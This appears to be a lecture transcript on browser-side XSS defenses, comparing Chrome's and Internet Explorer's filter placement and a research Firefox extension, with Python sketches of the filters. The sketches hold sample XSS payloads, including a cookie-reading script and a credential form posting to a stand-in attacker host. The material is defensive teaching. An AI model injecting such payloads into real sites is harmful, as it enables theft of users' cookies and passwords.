The client-side defenses are now supported in all the major browsers. Take, for example, IE or Chrome, and for Firefox there is an extension, NoScript. All of these have substantial support for defending against XSS. The basic idea is something like this. You have the client, the browser, on this side and the server on that side. One idea is that in the HTTP request that goes from here to there you look at all of the parameters, parameter 1, parameter 2, etc., and then when you see the response you try to match those parameters inside the HTTP response. If you see the same parameters coming back, that means there is some reflection, and if in those parameters you see special characters like this or this, then you encode them. So, this is one idea: encoding the special characters in the HTTP response when you have seen a match. Not just any special character, because you would disable the entire page if you did that; only the special characters that appeared in the HTTP request.
So, only these special characters that you find in par1, par2, etc., when you see them reflected back in the response. The basic idea of this client-side defense is: monitor the HTTP request, identify the parameters, and save the parameters somewhere. When the response comes in, you look to see whether those parameters occur in the response, using a string matching algorithm to check for that. If those parameters do not contain special characters, no problem, but if they do contain special characters, then encode them in the way I have just shown you, the HTML encoding with the ampersand and so on. So, that is one basic set of ideas, and IE, Chrome and NoScript use them in some form or the other.
To conclude our discussion of XSS defenses, we would like to show a brief block diagram of what a browser looks like. These are some of the components, the building blocks, of a browser: the user interface, the browser engine, the rendering engine, the network interface and the JavaScript interpreter. Let us see what each of these things is. The user interface plus browser engine takes the actions performed by the user, every action like a click or a drag or a drop, and forwards them to the rendering engine. It contains the address bar, the toolbar, etc. on your browser, so it is a very basic kind of component. The rendering engine is quite fancy. It basically parses the HTML document in the HTTP response that it gets and creates something called the document object model, the DOM. The network interface is responsible for sending out an HTTP request and receiving an HTTP response.
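The request and response matching defense described at the start of this passage can be sketched as follows. This is a toy model of the idea only, not how any particular browser or extension implements it: `filter_response`, the example URL and the exact-substring matching are assumptions made for illustration.

```python
from urllib.parse import parse_qsl, quote, urlsplit

SPECIALS = {
    "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;",
    "'": "&#39;", ";": "&#59;", "(": "&#40;", ")": "&#41;",
}


def encode_special(text: str) -> str:
    """Encode each special character once, in a single pass."""
    return "".join(SPECIALS.get(ch, ch) for ch in text)


def filter_response(request_url: str, response_body: str) -> str:
    """Encode request parameters that come back reflected in the response."""
    for _name, value in parse_qsl(urlsplit(request_url).query):
        reflected = value in response_body
        risky = any(ch in SPECIALS for ch in value)
        if value and reflected and risky:
            # Only the reflected copy is encoded, not the whole page.
            response_body = response_body.replace(value, encode_special(value))
    return response_body


request_url = (
    "http://www.vulnerable.example/page?par1="
    + quote("<script>alert(1)</script>", safe="")
    + "&par2=abc"
)
response_body = "<html><body><p>Hi <script>alert(1)</script> abc</p></body></html>"
filtered = filter_response(request_url, response_body)

print(filtered)
```

The page's own tags survive because they never appeared in the request; only the reflected parameter loses its special characters.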
So, the rendering engine parses and renders the document, and whenever it sees any JavaScript it sends it to the JavaScript interpreter to be executed. Now, what the Google Chrome browser has done is put an XSS filter between the rendering engine and the JavaScript interpreter. In what sense does it filter? Whatever JavaScript it sees going to the JavaScript interpreter, it matches against the HTTP request parameters. If there is a match, then it will disable the execution of that JavaScript, because that means it is reflected XSS and it is probably malicious. So, that is what Google Chrome will do.
On the other hand, Internet Explorer puts a filter at this other point, to match anything that is coming in the HTTP response with one of the parameters in the HTTP request, and if it sees something like that it does not allow it to execute. So, these are two different ideas, and you can compare them and see, for the different attack vectors that I had shown, which one will work for which attack vector. For example, if you have an HTML-only attack vector, the last vector that I showed, then putting the filter over here, in front of the JavaScript interpreter, will not prevent the malicious HTML that asks the user for credentials and so on. That will still be rendered, because that attack vector was pure HTML. What goes from the rendering engine to the JavaScript interpreter is only JavaScript, so a pure HTML attack vector does not get filtered out there.
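To compare the two filter placements, here is a toy model. It is emphatically not the real Chrome or Internet Explorer filter: both functions, the list of suspicious characters and the substring matching rule are assumptions chosen only to show why a filter in front of the JavaScript interpreter never sees an HTML-only vector.

```python
from html.parser import HTMLParser

SUSPICIOUS = set("<>\"'();")


class ScriptCollector(HTMLParser):
    """Collect script bodies, i.e. what would reach the JS interpreter."""

    def __init__(self):
        super().__init__()
        self.in_script = False
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.in_script = True
            self.scripts.append("")

    def handle_endtag(self, tag):
        if tag == "script":
            self.in_script = False

    def handle_data(self, data):
        if self.in_script:
            self.scripts[-1] += data


def risky(params):
    """Keep only parameters that contain at least one suspicious character."""
    return [p for p in params if SUSPICIOUS & set(p)]


def interpreter_filter_blocks(params, page):
    """Filter placed in front of the JS interpreter (toy model)."""
    collector = ScriptCollector()
    collector.feed(page)
    collector.close()
    return any(
        s and (p in s or s in p)
        for s in collector.scripts
        for p in risky(params)
    )


def response_filter_blocks(params, page):
    """Filter placed on the whole HTTP response (toy model)."""
    return any(p in page for p in risky(params))


script_vector = "<script>alert(document.cookie)</script>"
form_vector = '<form action="http://attacker.example/collect"><input name="pw"></form>'
script_page = "<html><body>" + script_vector + "</body></html>"
form_page = "<html><body>" + form_vector + "</body></html>"

print(interpreter_filter_blocks([script_vector], script_page))
print(interpreter_filter_blocks([form_vector], form_page))
print(response_filter_blocks([form_vector], form_page))
```

In this model the form vector passes the interpreter-side check simply because no script is ever handed to the interpreter, while the response-side check still notices the reflection.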
So, that attack vector will succeed on Chrome, for example, but then partial script injection might not succeed with the filter over here. There are so many different attack vectors that coming up with the best kind of defense for XSS is actually a challenge. What we have done over here is to design a defense we call X Buster, which is an extension to the Firefox browser. It has a filter at both of these points and uses a very interesting filtering algorithm. It takes each of the HTTP request parameters, splits it up into HTML contexts and JavaScript contexts, and stores them. Then, when it sees the response coming in, it does a match at this point: it looks at the entire web page, and if there is a match with any of the HTML contexts it will encode those strings. So, that is one place the filter is used. There is another part of the filter at this point: whenever it sees anything going into the JavaScript interpreter, and there is a match with one of the JavaScript contexts, it will encode the special characters in that, so that it is disabled and will not execute.
So, that is basically the idea. Because there are so many different attack vectors, and it is so complicated, some of them HTML only, some partial script injection, some multi-point injection and so on, you have to be very careful if you are trying to get rid of all possible XSS attacks. We will have this put on the web at some point. The paper is being written currently; the work was done by some students who graduated two years ago and some who graduated recently, and we will put it out as one of the technical reports very soon.
So, with that I conclude this discussion of XSS. We started with XSS attack scenarios and XSS attack vectors. We looked at the vulnerabilities behind XSS, basically this business of not sanitizing things and just reflecting user input. Then we looked at defenses: defenses on the server side, where Lucky showed you those particular statements in DVWA at security level 0 and security level 1, and defenses on the client side, which we have also been involved with, both the defenses that exist in the Chrome browser and the Microsoft Internet Explorer browser and some of the defenses that we ourselves have created over here. So, thank you for listening.